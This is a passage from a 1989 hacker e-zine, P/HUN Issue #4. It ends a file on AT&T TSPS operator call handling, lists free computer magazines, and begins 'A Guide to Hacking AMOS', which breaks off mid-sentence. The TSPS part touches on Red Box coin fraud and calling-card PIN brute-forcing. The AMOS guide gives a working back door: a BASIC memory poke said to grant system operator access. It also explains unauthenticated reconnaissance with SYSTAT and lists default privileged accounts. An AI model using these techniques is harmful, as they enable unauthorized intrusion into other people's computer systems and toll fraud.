

originated. In an effort to keep with the three main types discussed here,



some of the call types listed will not be explained.







        4.1.1) 1+ Calls



        ===============



         - DDD calls



         - Calls with ANIF or ONI



         - H/M calls



         - CAMA calls



         - 900 Dial Line Service (DLS)..."Dial a Vote"



         - NonCoin transfers from offices with out billing equipment



         - Coin Calls...Discussed later in greater detail







        4.1.2)  0+ Calls



        ================



         - Calling Card Service (CCS) Calls



         - Billed Number Screening (BNS) Calls



         - Originating Station Treatment (OST)..Third Party Billing, Collect..







        4.1.3)  0- Calls



        ================



         - OPCR ...Standard RBOC(or Equivalent) "0" operator







        4.1.4)  International Call Handling (ICH) ...Overseas Calls



        ===========================================================







        4.1.5)  Automated Quotation Service and H/M calls



        =================================================











4.2  Operator Originated



========================







The second category of calls handled by TSPS are operator originated, and are



normally only initiated after a response to a customers request.  These calls



are of a nature that require operator intervention in order to complete.



Examples: BLV/EMG INT, collect, third party billing...







        4.2.1)  Special Operator Service Traffic (SOST)



        ===============================================



        - These include calls which must be transferred to a SOST switchboard



          before they can be processed. Examples: Conferences, Appointment,



          Mobile...







        4.2.2)  Delayed Calls



        =====================







        4.2.3)  Operator Service Calls



        ==============================



         - Customer/ Operator requested Rate and Route information ( RQS )







        4.2.4)  CAMA Transfer Calls



        ===========================



         - Includes ANIF and ONI



         - Transfers from areas without billing equipment







        4.2.5)  Busy Line Verification (BLV)



        ====================================



         - The Busy Line Verification allows a TSPS operator to process a



           customers request for a confirmation of a repeatedly busy line.



           This service is used in conjunction with Emergency Interrupts and



           will be discussed later in more detail.







        4.2.6)  Inward Calls



        ====================



         - An inward call requires a TSPS operator to provide services which



           the customers originating operator is not able to provide.  Ex:



           connection to a hard to reach number, BLV/EMG INT, CCS billing



           validation...An inward call can be originated with any of the



           following arrival codes:







                - 121  : NonCoin code...standard inward connection



                - 1150 : Coin code



                - 1155 : Noncoin with T&C code



                - 1160 : TSPS operator assisted inward CCS validation



                - 1161 : Automated inward CCS validation for non TSPS operator



                         with DTMF touch tone signaling.



                - 1162 : Automated inward CCS validation for non TSPS operator



                         with MF signaling.







                - Examples of the above codes:



                - KP+NPA+121+ST gets inward operator in NPA selected with only



                  INWD key illuminated, indicating call connected to position



                  in an inward call.







                - KP+1161+ST gets automated CCS validation that responds to



                  DTMF tones.



















5.0  General Call Processing for Coin Stations and CCS



======================================================







This section will deal with the processing that occurs during all customer



initiated calls, and can be applied to both Coin and CCS calls.  The following



processes are presented in the order which they would normally be handled.







        5.1)  Trunk Seizure



        ===================



         - When a local office seizes a trunk in response to a customer request



           (i.e.- A customer has picked up the phone, placing it off-hook),



           current flows thru the circuit, changing the state of the ferrods



           (i.e.- scan points ) from an on-hook to an off-hook position.  When



           this change is determined by the PTS (Position and Trunk Scanner) at



           the RTA (Remote Trunk Arrangement) to be an actual off-hook



           transition, and not merely a flash (tapped switch hook), it is taken



           as a request for service.







        5.2)  Digit Reception



        =====================



         - After a trunk is seized the local office sends the called and



           calling number to the TSPS by means of MF pulsing.  A Base Remote



           Trunk is connect to the MF receiver, which then proceeds to outpulse



           the MF digits.  The digits are received and registered on ferrods by



           the PTA in the order in which they were received.  The called number



           is the number dialed by the customer and consists of either 7 or 10



           digits; the calling number is determined by the local office ANI



           equipment or by ONI, in case of ANIF.







        5.3)  Bridging a Position



         =========================



          - An idle occupied position is then bridged onto the call by a



            connection to the TSPS.  If operator service is required after



            connection to a position, the operator is prompted by a "zip" tone,



            and is alerted by a KIND OF CALL lamp, which provides information



            as to whether the call is coin, noncoin, 0+, 0-...If no operator



            service is required, the MF digits are outpulsed along the



            appropriate routing.







        5.4)  Call Connection



        =====================



         - If operator action was needed, upon the operators disconnect of the



           line (position released), the network connection between the the



           TSPS trunk and the base remote trunk is severed. The established



           through connection is now placed in a call floating (talking) state



           until disconnect.







        5.5)  Call Disconnection



        ========================



        - Both ends of a connected call are monitored for an off-hook state



          change, which upon indication,must occur long enough to be recognized



          as an actual disconnect (and not merely a flash...).  Another manner



          of disconnect is from a called party Time Released Disconnect (TRD),



          which is employed to limit billed party liability and release network



          connections.  Example: A customer requests a disconnect after x number



          of minutes, or after $x.xx.  The final action in a disconnect is to



          return the TSPS trunk to an idle position, which then awaits



          recognition of another service request.







        5.6)  AMA Data Accumulation and Reception



        =========================================





           registered, and prepared for billing.  The following is just some



           of  the information that is recorded on disk for processing.







                - Call Connect



                - Elapsed time



                - Signaling Irregularities



                - WalkAway Toggle (coin station fraud...discussed later)



                - Type of number billed



















6.0  Coin Station Calls and ACTS Processing



==========================================







In general, coin station calls can be divided into 1+, 0+ and 0- originated



calls, not including 0+ and 0- CCS calls which will be discussed later in this



file.  All calls falling into these categories go through the following basic



operations, many of which were described in section 5 of this file. (The []



indicate operations that may or may not be present, depending on the type of



call placed)







        - 1) Trunk Seizure



        - 2) Digit Reception



        - 3) Bridging a Position [and Coin Detection and Announcement (CDA)]



        - 4) [Operation Action and] Digit Outpulsing.



        - 5) Talking Connection



        - 6) Call Disconnect



        - 7) AMA Processing















6.1  Automated Call Processing



==============================







All coin station calls requiring coin input from the customer are handled by



the Automated Toll Services (ACTS) which is implemented by the Station



Signaling and Announcement Subsystem (SSAS).  The SSAS automates the initial



contact on most 1+ (station paid) toll calls, by transmitting an announcement



requesting the initial deposit from the customer, and counting the deposits.



If an unusual delay occurs during the coin deposit period, the SSAS will prompt



the user for the remaining deposit needed to complete the call.  Upon



completion of sufficient deposit, SSAS provides an acknowledgement announcement



thanking the customer, and then causes the outpulsing of the called digits to



be handled by the Stored Program Control (SPC).  This delay in outpulsing



prevents free, short duration messages and keeps the audible ring of the called



party from interfering with coin detection signals.  Any customer over-deposit



is automatically credited towards overtime charges.  SSAS can accommodate



initial periods of up to 6 minutes, at the end of which the local office rate



schedule is accessed and announcement may or may not notify the customer of



the end of initial period.







 6.2  Operator Intervention



===========================







If at any time during the coin collection period, a customer fails to deposit



the sufficient funds (within a specified time period), or a flash is registered



on the switchhook, a TSPS operator will be bridged onto the call.  In this



event SSAS will monitor the coin deposits via a type I CDA circuit; however all



automated coin announcements will be suppressed.  All calls originating from



postpay coin stations must initially be handled by an operator, in that postpay



coin stations lack coin return equipment, and cannot return deposited coins



(i.e.- Postpay stations do not have a coin hopper, only a coin box).  This



physical restriction requires the operator to verify that the correct party has



been reached (and goes off-hook), before the customer makes any deposit.  Upon



verification, a type II CDA circuit is connected to count and monitor the coin



deposits.  This type of circuit is also connected whenever there is a large



amount of change associated with the call.  This is because the coin hoppers on



standard payphones, can only handle limited deposits.  If a deposit exceeds the



hopper limit, an operator will be bridged to the circuit to make a series of



partial collections.











6.3  SSAS Fully Automatic Criteria



==================================







The SSAS fully automates 1+ coin station calls (ACTS) if and only if all of the



following conditions are met.  Failure to meet any of these conditions results



in operator intervention.







        6.3.1)  ACTS Converted Trunk Group



        ==================================



        - Coin Stations must be converted to provide DTMF coin deposit signals



          that the CDA can recognize.







        6.3.2)  Machine Ratable



        =======================



        - The TSPS must receive sufficient rating information; failure to do so



          will result in operator intervention.







        6.3.3)  Successful ANI



        ======================



        - If ANIF or the call is ONI, an operator must be added to the circuit



          to record the calling number.







        6.3.4  Cannot Be a Postpay Station



        ==================================



        - See previous explanation of postpay stations (6.2).







        6.3.5  Cannot Have Large Charges



        ================================



         - See previous explanation (6.2).











6.4  Fraud Detection and Prevention



==================================







If a calling customer goes on-hook (hangs up), at the end of a conversation and



charges are still due, TSPS automatically sends a ringback signal to that



station in the attempt to get the customer to pick up the phone.  If the



calling party answers, an ACTS overtime charge message is made requesting the



customer to deposit the remaining amount due.  At any time during this message,



an operator may be connected to the circuit and harass the customer for payment



If however 5 rings with a 4 second interval occur without an off-hook state



change, TSPS assumes a walkaway, and a registered traffic counter is flagged,



a walkaway bit set, and the amount due is all registered as AMA data.







Whenever the called party is off-hook, ACTS is susceptible to generated coin



signals (Red Box Tones).  In an attempt to prevent this fraud, a special type



II CDA is employed: Two-wire trunks are isolated between forward and back party



to monitor coin deposits.  The talking path maintains conversation by being



routed through the type II CDA.  When coin signals are detected, the SSAS



informs TSPS that a called party fraud is suspected.  If more then one



detection occurs on one call, TSPS flags a fraud indicator on the calls AMA



record. NOTE:A trunk group may or may not detect and/or record this information



depending on office criteria.



















7.0  Calling Card Service and Billed Number Service



===================================================







I am assuming that everyone reading this file has at least some concept of what



a calling card is and how it would be utilized from a local office. The CCS and

BNS services are implemented in TSPS by CCIS hardware, SSAS and several



processing programs that will not be discussed in this file (ABEGN, ACALL,



ASEQ...)  The CCS and BNS together provide for the customer an automated credit



card calling option that was initially implemented as an alternative to third



party billing, collect and large change calls.







In order for the CCS and BNS to function, they require that each TSPS becomes



a node on the SPC network, which then allows access to a nationwide database of



Billing Validation Applications (BVA).  The BVA currently consists of nodes



which are connected by CCIS, and are in turn made up of individual Billing



Validation Files (BVF).  A BVF is a file of data that is needed by the SPC and



associated database software to process queries about the data.  Each TSPS is



integrated into the SPC network and uses the CCIS direct signaling to access



the BVA.  Connected in parallel to the BVA is the Network Call Denial (NCD),



which allows the call denial to AT&T customers with outstanding bills.







The CCS billing number consists of a 10 digit billing number and a 4 digit



PIN.  There are two categories that a CCS billing number can fall into and



they are as follows:







        - 7.0.1)  Directory Billing Number



         =================================



         - The billing number is usually the directory number to which the



           card is billed, and is in the following format: NPA-NXX-XXXX :



           Where the NPA represents Numbering Plan Area, N is a digit 2-9, and



           X is a digit 0-9.







         - 7.0.2)  Special Billing Number



          ===============================



          - Wheras the typical CCS billing number is discribed above in 7.0.1,



            here exists a special type of billing number that bills the card to



            a special nondirectory billing number.  The format for this type of



            card is as follows: RAO-(0/1)-XX-XXXX :  Where the RAO is the



            Revenue Accounting Office code which assigns the billing number.



            The X represents a digit 0-9.







The PIN is a 4 digit number in the format of NYYY, where N is a digit 2-9, and



Y a digit 0-9.  Each PIN is designated upon assignment to the customer as



either restricted or unrestricted.  An unrestricted PIN can place calls to all



destinations.  If the called number is the same as the billing number, only the



4 digit PIN need be entered by the customer.  A restricted PIN can only be used



for station calls to the billing number.  NOTE: A special billing number



(section 7.0.2) can only have an unrestricted PIN.











The CCS can be broken down into two basic category of calling types and are as



follows:







7.1  Customer Dialed CCS Call



=============================







The customer initiates the CCS sequence by dialing a 0 + Called Number.  The



Called number can take the format of a 7 digit number, a 14 digit number or



01+ country code and national number.  This information, as well the calling



number (originating) is received by TSPS from the CO.  OST is then used to



determine whether CCS is available/given to the customer.  Based on the



determined OST features (Does phone have Touch Tone?  Is it a coin station?..),



TSPS either routes the call to an operator or provides an alerting tone and



announcement to prompt the customer for the CCS number (in the format discussed



in sec 7.0).  Assuming no operator intervention, the CCS number is subjected to



a series of checks and queries detailed below. (sec 7.3)







7.2 Operator Dialed CCS Call



============================







There are several ways a customer can receive operator assistance in CCS



dialing.







        - 7.2.1)  0- call.



        - 7.2.2)  0+ Called Number +0



        - 7.2.3)  0+ Called Number +Switch-hook flash.



        - 7.2.4)  0+ Called Number +No Action.



        - 7.2.5)  0+ Called Number +OST feature information requiring operator



          intervention. Example: Call placed from rotary phone...



        - 7.2.6)  0+ octothorpe.  A customer dials an octothorpe



         ( pound key "#") after the initial 0.







When the position is seized if the operator determines that a CCS call is



requested, the operator keys in the CCS number (or the PIN only) and call is



subjected to a series for checks for validity, detailed below (sec 7.3)







7.2.1  Non-TSPS Dailed CCS Call



===============================







The TSPS operators do not serve all CCS users.  Non-TSPS operators and



independent telephone companies also serve CCS customers, and must access the



BVA for validity checks.(Examples: mobile,marine,international...)  This access



to the BVA is provided for cordboards and independent telephone companies by



reaching a nearby TSPS, via TSPS base unit inward trunks.  A distant operator



may reach the BVA by any of the routing codes detailed in section 4.2.6, and



the CCS validation is subject to the same security checks detailed below.  If



a non-TSPS operator dials either KP+(1161 or 1162)+ST, the operator hears a CCS



alert tone, and then has one minute in which to dial the 14 digit CCS number.



The TSPS initiates a format check, an APF check (see 7.3), and access the BVA



to determine the status of the CCS number in question.  The following are the



different corresponding announcements which would follow:







        - Calling Card Service Number Accepted, PIN unrestricted



        - Calling Card Service Number Accepted, PIN restricted



        - Calling Card Service Number Accepted, RAO unknown



        - Calling Card Service Number Rejected







If a CCS number is accepted, the connection to the non-TSPS operator is



terminated by the TSPS.  If a rejection message results, the operator will be



prompted by the alert tone and may attempt to redial the CCS.











7.3  CCS Validation



===================







After the CCS billing number is keyed in (either by customer, TSPS operator,



or independent operator) the All PINs Fail (APF) feature may cause the card to



be rejected and the call to be halted.  The APF is a security feature designed



to frustrate attempts at discovering valid PINs by a brute force hack method



(trial and error).  A list of CCS validation failures is maintained, which is



updated with both invalid billing numbers and calling numbers.  When a number



of failures for a given billing number exceeds a specified threshold, in x



amount of time, all subsequent attempts are declared invalid for a certain



amount of time y (Lock Out Time).  Even if the actual PIN is used during the



lockout time, the CCS number would be considered invalid, and the call process



would be halted.











7.4  Billed Number Screening



============================







The BNS service applies to collect and third party billing calls placed



through a TSPS operator.  The BVF contains information designating certain



numbers as "collect denied" or "bill-to-third denied".  Each time an operator



attempts to place a collect or third party billing number a BVA and a NCD



inquiry are made.



















8.0  Busy Line Verification



===========================







A dedicated network is provided to process BLV calls and traffic.  This network



originates at the TSPS base office and connects through dedicated trunks to



toll, intertoll, and local offices.  The equipment consists of the BLV trunk, a



TSPS-4 wire bridging repeater, a verification circuit at TSPS, InComing



Verification Trunks (ICVT), OutGoing Verification Trunks (OGVT) at both toll



and intertoll offices, and Incoming No Test Trunks (INTT) at local offices.



The TSPS gains access to a single local, toll, and/or intertoll office.







The initial request for a BLV appears as an position seizure to a TSPS operator



over an incoming trunk via a local office or as an inward trunk via a toll



office.  The initial loop seized becomes the originating loop and is connect in



position via an idle TSPS loop.  In that the originating loop cannot be



connected to the verification loop, the operator must switch between the two.







Security is maintained to insure that a customers privacy is not violated, and



consists of the following:







        - 8.0.1)  Speech Scrambler at Console Level (not BLV trunk level).



        - 8.0.2)  Alert Tone Generator (ATG).



        - 8.0.3)  Translation of the NPA to 0XX or 1XX.



        - 8.0.4)  Dedicated BLV trunks.



        - 8.0.5)  Cross office security checks at toll offices.







8.1  BLV Processing



===================







When a customer requests that a BLV be preformed on a certain number within



the TSPS's LAN the following actions are taken.







        - 8.1.1)  The TSPS attempts to DDD the number in question , to confirm



         that the number is indeed busy.  This action is preformed so that if



         in the event that an recorded error announcement is reached, the



         operator may understand the nature of the error without the speech



         scrambler interfering in quality.







        - 8.1.2)  If the line is confirmed to be busy and the customer requests



         further action, the operator then attempts verification through the



         BLV network. The operator then presses the VFY key, in which case an



         attempt at a BLV will be made if and only if the following conditions



         are met:







               - 8.1.2.1)  There is an idle loop at the position



                 ===============================================



                 - This condition must be met because the BLV trunk must be



                   placed in a loop with the Traffic Service Position.  If



                   there are no idle loops remaining the BLV cannot be



                   processed.  This condition can be gotten around by the



                   operator pressing the POS TRSFR key, which causes all the



                   calls in the hold state to be transferred to loops on the



                   original operator position.







                - 8.1.2.2)  The call is on an incoming/inward trunk



                   ================================================



                   - This insures that an operator cannot preform a BLV



                     without a originating customer request.







                - 8.1.2.3)  The called party is off-hook



                  ======================================



                  - See 8.1.2.2







                - 8.1.2.4)  The called number is a domestic number



                  ================================================



                   - That is the called number cannot be an overseas number.







                - 8.1.2.5)  The call has no forward connection



                  ============================================



                  - This ensures that the busy condition detected by the INTT



                    is not due to the connection of the calling party.







                - 8.1.2.6)  The line number can be verified



                  =========================================



                   - This condition would fail if the local office is



                     not served by the BLV network...







                   - ..or the number in question is excluded from BLV calls



                    (Example: Emergency or Police Lines...)







        8.1.3)  The BLV is preformed and the BLV trunk dropped by pressing



                the REC MSG key for an incoming call or VFY for an inward call.















9.0  Conclusion : Acknowledgements and References



=================================================







I have assumed that the reader of this file has a general working knowledge



of phone systems and their associated terminology.  As it is impossible to



please everyone, some readers will find this file too advanced while others



will find it lacking in several areas...too bad.  This file has intentionally



*not* covered previously released information on TSPS found in files by other



authors, in an attempt to provide the phreak/hack community with another source



of information to be used in conjunction with the existing ones. The following



reading list is highly recommend for furthering ones knowledge on TSPS, and is



as follows:







 - Understanding TSPS Part 1: The Console - Written by The Marauder, LOD/H



   Technical Journal: Issue No. 1, file #4.







 - Busy Line Verification Part 1 - Written by Phantom Phreaker, Phrack Vol 2,



   Issue XI, file #10.







 - Busy Line Verification Part 2 - Written by Phantom Phreaker, Phrack Vol 2,



   Issue XII, file #8







 - Telephony Magazine







9.1  Acknowledgements



=====================







 - Eastwind...the Man Behind the Garbage Can...



 - AT&T



 - My Local RBOC...and all of the Trash that's fit to print











=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=







                   P/HUN Issue #4, Volume 2: Phile 7 of 11



                   DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD



    5/19/89              *  Free Computer Magazines  *          5/19/89







                                       by







                              +  Southern Cross  +







_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _







TPT Networking Management



1421 S. Sheridan



P.O. Box 21728



Tulsa, OK 74101-9977







Computer Design                      Recommended



P.O. Box 2389



Tulsa, OK 74101-9933







Scientific Computing & Automation    Recommended



301 Gibraltar Drive



P.O. Box 608



Morris Plains, NJ 07950-0608







Industrial Product Bulletin



301 Gibraltar Drive



P.O.Box 650



Morris Plains, NJ 07950-0650







Computer Products



301 Gibraltar Drive



P.O. Box 601



Morris Plains, NJ 07950-9813







Connect Journal of Computer Networking



3165 Kifer Rd.



P.O.Box 58145



Santa Clara, CA 95052







Microcomputer Solutions Magazine



Intel Corporation



GRI-58



P.O. Box 58065



Santa Clara, CA 95052-8065







Evaluation Engineering



2504 North Tamiami Trail



Nokomis, FL 34275-9987







Electronics                          Recommended



P.O. Box No. 2713



Clinton, Iowa 52735







Systems Integration



P.O. Box 5051



Denver, CO 80217







EDN                                  Recommended



P.O. Box 5262



Denver, CO 80217-9865







Computer Technology Review           Recommended



West World Productions, Inc.



924 Westwood Blvd., Suite 650



Los Angeles, CA 90024-2910







Microwave Journal                    Recommended



685 Canton Street



Norwood, MA 02062







NASA Tech Briefs                     Recommended



Associated Business Publications



41 E. 42nd St., Suite 921



New York, NY 10164-0672







Computer & Software News



A Lebhar-Friedman Publication



Grand Central Station



P.O. Box 3119



New York, NY 10164-0659







Compliance Engineering               Recommended



629 Massachusetts Avenue



Boxborough, MA 01719-9974







Government Computer News



P.O. Box 3705



McLean, VA 22103







Federal Computer Week



3110 Fairview Park Drive



Falls Church, VA 22042-4599





Defense Electronics                  Recommended



EW Communications, Inc.



P.O. Box 50249



Palo Alto, CA 94303-9983







Defense Computing                    Recommended



P.O. Box 5286



Pittsfield, MA 01203-5286







Laurin Publishing Co., Inc.



Photonics Spectra



P.O. Box 2037



Pittsfield, MA 01202-9925







Computer Graphics Review



P.O. Box 12950



Overland Park, KS 66212-0950







Electronic Design                    Recommended



VNU Business Publications



P.O. Box 5194



Pittsfield, MA 01203-5194







Electronic Products                  Recommended



P.O. Box 5317



Pittsfield, MA 01203-9899







Software Magazine                    Not Recommended



P.O. Box 542



Winchester, MA 01890







Specialized Products Company         Recommended



2117 W. Walnut Hill Lane



Irving, TX 75038-9955







The LAN Catalog & Black Box Catalog



Black Box Corporation



P.O. Box 12800



Pittsburgh, PA 15241-9912







Computer-Aided Engineering



A Penton Publication



1100 Superior Avenue



Cleveland, OH 44197-8006







PERX (catalog)



1730 S. Amphlett Blvd., Dept. 222



San Mateo, CA 94402







Anasco (catalog)



Commerce Center Building



42A Cherry Hill Drive



Danvers, MA 01923-9916







MetraByte Corporation (catalog)      Recommended



440 Myles Standish Blvd.



Taunton, MA 02780







Micro Networks (A/D catalog)         Recommended



324 Clark Street



Worcester, MA 01606







Programmer's Connection



7249 Whipple Ave. NW



North Canton, OH 44720







Burr-Brown Corporation (catalog)



P.O. Box 11400



Tuscon, AZ 85734







WAVETEK San Diego (catalog)          Recommended



P.O. Box 85434



San Diego, CA 92138







Digi-Key Corporation (catalog)       Recommended



701 Brooks Avenue South



P.O. Box 677



Thief River Falls, MN 56701-0677







Consumertronics Co. (catalog)        Recommended



2011 Crescent Drive, P.O. Drawer 537



Alamogordo, NM 88310







Time Motion Tools (catalog)



410 South Douglas Street



El Segundo, CA 90245







EXAR Corporation (modem design catalog)



750 Palomar Ave.



P.O. Box 3575



Sunnyvale, CA 94088



ATTN: Marketing Communications



Chilton's Instrumentation & Control News



Box 2006



Radnor, PA 19089-9975







Communications Week



P.O. Box 2070



Manhasset, NY 11030







Computer Systems News



CMP Publications, Inc.



600 Community Drive



Manhasset, NY 11030







Electronic Engineering Times



Circulation Dep't.



Box 2010



Manhasset, NY 11030







Network World



P.O. Box 1021



Southeastern, PA 19398-9979







Digital Review



P.O. Box 40065



Philadelphia, PA 19106-9931







Digital News



P.O. Box 593



Winchester, MA 01890-9953







DEC Professional



P.O. Box 503



Spring House, PA 19477-0503







Macintosh News



Circulations Dep't.



P.O. Box 2180



Manhasset, NY 11030







UNIX Today!



CMP Publications, Inc.



600 Community Drive



Manhasset, NY 11030







LAN Times



122 East 1700 South



P.O. Box 5900



Provo, UT 84601







Electronic Business



275 Washington Street



Newton, MA 02158-1630







PCNetwork



P.O. Box 457



Newton, NJ 07860







INFO World



P.O. Box 5994



Pasadena, CA 91107







Reseller Management                  Not Recommended



301 Gibraltar Drive



P.O. Box 601



Morris Plains, NJ 07950-9811







Computer Reseller News               Not Recommended



CMP Publications, Inc.



600 Community Drive



Manhasset, NY 11030







This is a partial list of free computer magazines and newspapers of interest



to the hacker/phreaker community.  Just ask for a free subscription form,



fill it out, and you'll have enough to read for a long time! (You also get to



stay on top of the "state" of the art)  The recommended mags have articles,



products, schematics, and diagrams of particular interest and application



for most of the community. (You'll find that they're an education unto themselve







                                             +SC+



                                             Cruise Director



                                             S.S. Phuntastic



                                             (...lost in a sea of paper...)







=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=











+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



+              P/HUN Issue #4, Volume 2: Phile 8 of 11                +



+              DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD                +



+                      A Guide to Hacking AMOS                        +



+                      -----------------------                        +



+                        By  NightCrawler                               +



+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++







The Alpha Micro computer is a fairly easy system to understand, for



those of you familiar with VAX systems.  The operating system (AMOS)



is a ripoff of the DEC stuff, so many commands are similar.  This is



a guide on how to use the Alpha.







Background on security:



---------- -- ---------







When the Alpha Micro leaves the factory, they do not have any type of



security feature built into it, except for certain higher end models,



which will be discussed later.  Thus, if the user installs a modem



directly to the system, and you call in, you'll be at the OS level



already.  Pretty easy, eh?







Due to the lack of a cursor display character, the pound sign (#) will



be used to represent the cursor throughout this document.  The prompt



for AMOS is a period, which users refer to as the dot.  Wnen you log on,



you'll see this:







        .#







At this point, you can type away and use the various accounts and



programs on the system.  When you first connect, depending on how the



last user left the modem, you may or may not be logged in to a



partition.  To verify this, type in the LOG command.







        .LOG







The computer will respond in one of two fashions.  If it says "Not



logged in", then you will have to log to an existing account.  If it



says "Current login is DSK1:[203,1]", then there is no need to scan



for an account right away.







Perhaps the most important thing to do after this is to do a SYSTAT,



which will let you know who else is on the system, and what account,



program is being run, and other info.  Example:







        .SYSTAT







Status of AMOS/L version 1.3D(165) on Friday, November 11, 1988 03:24:54 PM







JOB1  TRM1  DSK1:201,3  0067732 ^C CONECT 122880 bytes at 4505554



JOB2  TRM2  DSK0:1,2    0024984 TI SYSACT 176800 bytes at 4505554



JOB3  TRM3  Not logged  0015460 ^C MEMORY  12288 bytes at 3137554



MODEM HAYES DSK0:1,4    0037325 SL SYSTAT  67912 bytes at 2179023







4 jobs allocated on system, 3 jobs in use (3 logged in)



Total memory on system is 2048K bytes



System uptime is 07:28:19







DSK0        26402 blocks free                DSK1        3578 blocks free



4 devices on system, total of 29980 blocks free







        .#







Here's a quick rundown on what each column means...



Col 1: The name of the job



Col 2: The terminal to which the job is attached



Col 3: The device and account into which the job is logged



Col 4: The octal memory address where the JCB is located



Col 5: Terminal status of for that job



Col 6: Last program run by that job



Col 7: Number of bytes (decimal) of memory allocated



Col 8: Octal memory address for beginning memory partition







The rest is self explanatory.  The 5th column (terminal status) has



numerous codes which need to be given.  Here's the abbreviation and what



it stands for:







        TI        Terminal input wait state



        TO        Terminal output wait state



        LD        Program load state



        SL        Sleep state



        IO         I/O access other than terminal



        EW        External wait state



        RN        Running



        SP        Suspended state



        SW        Semaphore wait



        ^C        Control-C







The SYSTAT program can be used even when you are not logged in, which



is a plus if you wish to access an account without knowing the password.



There is another program, called STAT, but don't use this.  It



constantly updates the screen, and will mess you up if you're using a



modem.







Before going further, it should be mentioned on how the Alpha Micro



computer is structured.  On each system, a number of hard drives



subdivided into logical units are encountered.  These may be named in



any fashion by the sysop, following only the limitation of the LU being



three letters or less in length.  This is then followed by the device



number.  Sample LU's may look like:  DSK0:, DSK1:, WIN0:, HWK3:, etc.







On each disk is found a grouping of accounts, also known as partitions,



or PPN's (project, programmer number).  It is in these accounts where



you log in to, and execute programs.  These are enclosed in square



brackets [], to separate them from the disk specification.  When used



all togther, it looks like this:







DSK0:[1,2], DSK0:[1,4], WIN3:[100,0], DSK4:[377,7]











System Commands:



------ ---------







When in doubt, type HELP.  This will give you some online information



the system you are currently logged in to.  Below are a list of some



of the more common commands that you can use.







ASCDMP -- displays the data in physical bocks in ASCII form.



ATTACH -- connects a job to a terminal.



BASIC  -- places you in interactive BASIC mode.



BATCH  -- loads frequently used commands to your memory partition.



BAUD   -- change the baud rate of your terminal.



CAL100 -- allows you to calibrate the clock oscillator.



CLEAR  -- write zeroes to all free disk blocks.



COMPIL -- use this to compile BASIC programs.



COPY   -- copies one or more files between accounts or disks.



CREATE -- creates a random file of specified size  (any size!!).



CRT610 -- verifies quality of videocasstte backup media.



DATE   -- returns with current system date.



DING   -- rings the terminal bell.



DIR    -- gives a directory listing for specific files or accounts.



DIRSEQ -- alphabetizes all current entries in an account.



DSKANA -- analyzes the data on a disk, and reports errors.



DSKCPY -- copies contents of one disk and places on another disk.



DSKDDT -- allows you to examine and change data directly on disk.



DSKPAK -- packs the blocks in use to create area of free blocks.



DUMP   -- display file contents & memory to the screen.



ERASE  -- deletes one or more files from disk.



ERSATZ -- displays the currently defined ersatz names.



FIX    -- disassemble assembler (.LIT) code.



FORCE  -- allows you to send terminal input to another job.



HELP   -- displays all available help files for the system.



JOBALC -- displays your job name.



JOBPRI -- determine your job priority, and change other's priority.



JOBS   -- shows all jobs on system, and how many are in use.



KILL   -- kill the program being run by another job, or a single job.



LNKLIT -- creates ML programs by linking object code files.



LOAD   -- loads disk files into your memory partition as mem modules.



LOG    -- logs you into an account so you can access the files there.



LOGOFF -- logs you out of the account you were logged into.



MAKE   -- creates the first record of a SEQ file (make a bogus file).



MEMORY -- allocates memory to your job (e.g. .MEMORY 64K).



MONTST -- tests the system monitor by bringing up the system new.



MOUNT  -- see which disks are on the system. Do a /U to unmount a disk.



M68    -- assemble an assembler program to an unlinnked ML file.



PASS   -- allows you to change your account password.



PPN    -- displays a list of all accounts on a logical device (eg DSK0:).



PRINT  -- send one or more files to a printer.



QDT    -- allows you to examine and modify locations in memory.



REBOOT -- reboots the system after hitting RETURN.



REDALL -- diagnostic test that looks at disk & reports read errors.



RENAME -- rename files in an account from one name to another.



RUN    -- runs a compiled BASIC program.



SAVE   -- save memory modules as disk files.



SEND   -- send messages to other terminals on the system.



SET    -- set terminal handling options for your terminal.



SLEEP  -- put your job to "sleep" for a period of time.



SORT   -- alphabetically & numerically sort data in a SEQ file.



STAT   -- displays & continually updates status of all system jobs.



SUBMIT -- used to enter, change, or delete files from task manager.



SYSACT -- used to change account passwords, or initialize a disk.



SYSTAT -- mentioned above.



TIME   -- displays or sets the time of day.



TRMDEF -- gives information about the system terminals.



TYPE   -- displays a text file to the screen (use the /P switch).



VCRRES -- read files from videocassette to disk.



VCRSAV -- save files from disk to videocassette.



VER    -- gives you version of current operating system level.



VUE    -- create and enter text editor.  Use ESCape to toggle modes.







You have to be careful with how the programs are used.  If done



inappropriately, you could do major damage to the computer.  Many of



the above programs can only be executed from the operator account



DSK0:[1,2].











+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++







Entering via BASIC:







There is a back door in the version of BASIC that comes bundled with



AMOS.  Depending on the type of security present, you can gain access



to the system operator account (DSK0:[1,2]), which gives you the power



to do quite a few things.  What the command essentially does is poke



into memory the appropriate values to give you sysop access.







Type this in at the dot prompt (.) :







.BASIC







AlphaBASIC Version 1.3 (217)







READY







#







Once inside BASIC, type in this command as seen below;  it doesn't



matter if you use upper or lower case.







WORD(WORD(1072)+20)=258







BYE







.#







The BYE command exits you out of BASIC and puts you back at the



OS level.  You can also rename files and open files via BASIC.







Depending on the security in the system, if you typed in everything



as above, you should be logged into DSK0:[1,2], also known as OPR:.



This is the system operator's account, from which all types of



commands can be issued.







+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++







When you finally get connected to the system, you need some place to log



in to.  There are certain default accounts on every system.  These are:







        OPR:  --> DSK0:[1,2]                SYS:  --> DSK0:[1,4]



        DVR:  --> DSK0:[1,6]            CMD:  --> DSK0:[2,2]



        LIB:  --> DSK0:[7,0]                HLP:  --> DSK0:[7,1]



           BOX:  --> DSK0:[7,2]                BAS:  --> DSK0:[7,6]



        MAC:  --> DSK0:[7,7]







While logging around to the different accounts, some will have defined



"ersatz" names.  This means that besides the [p,pn] specification, you can



